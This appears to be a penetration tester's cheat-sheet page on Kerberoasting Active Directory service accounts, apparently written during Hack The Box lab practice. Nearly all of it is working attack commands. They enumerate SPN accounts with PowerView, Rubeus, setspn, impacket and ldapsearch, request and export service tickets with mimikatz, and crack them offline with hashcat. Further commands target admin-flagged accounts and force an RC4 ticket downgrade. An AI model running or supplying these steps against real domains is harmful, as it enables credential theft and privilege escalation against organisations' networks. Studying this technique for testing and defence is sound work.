Skip to content

Kerberoasting

Identify

Windows AD Module in powershell 

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Using Powerview 
Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
Living off the land 
setspn.exe -Q */*
Using Rubeus 
.\Rubeus.exe kerberoast /stats
Linux 
impacket-GetUserSPNs -dc-ip <dcip> domain.local/username

ldapsearch -x -b "DC=certified,DC=htb" -s sub "(&(objectClass=user)(servicePrincipalName=*))" -H ldap://10.129.229.25 | grep -i samaccountname: | cut -f 2 -d " "

Exploit

Make sure you're time is synced with remote host 

sudo timedatectl set-ntp off
sudo rdate -n <targetDC>
From Linux 
impacket-GetUserSPNs -dc-ip <dcip> domain.local/username -request

impacket-GetUserSPNs -dc-ip <dcip> domain.local/username -request-user
you can also use -outputfile <name> 
nxc ldap <IP> -u 'user' -p '' --kerberoasting <OUTFILE>

Crack hash 

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
From Windows - Semi-manual approach 

setspn.exe -Q */*

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.domain.local:1433"

mimikatz # base64 /out:true
mimikatz # kerberos::list /export  

echo "<base64 blob>" |  tr -d \\n 

cat encoded_file | base64 -d > sqldev.kirbi

python2.7 kirbi2john.py sqldev.kirbi

This will create a file called crack_file. We then must modify the file a bit to be able to use Hashcat against the hash.

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

Crack the file

hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

note

If we decide to skip the base64 output with Mimikatz and type mimikatz # kerberos::list /export, the .kirbi file (or files) will be written to disk. In this case, we can download the file(s) and run kirbi2john.py against them directly, skipping the base64 decoding step.

PowerView 

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname

Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation
Rubeus List info about kerberoastable accounts 
.\Rubeus.exe kerberoast /stats
target admin acccounts 
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
use tgt delegation to force RC4 downgrade of tickets. (Doesn't work on >= Win 2019) 
.\Rubeus.exe kerberoast /tgtdeleg /nowrap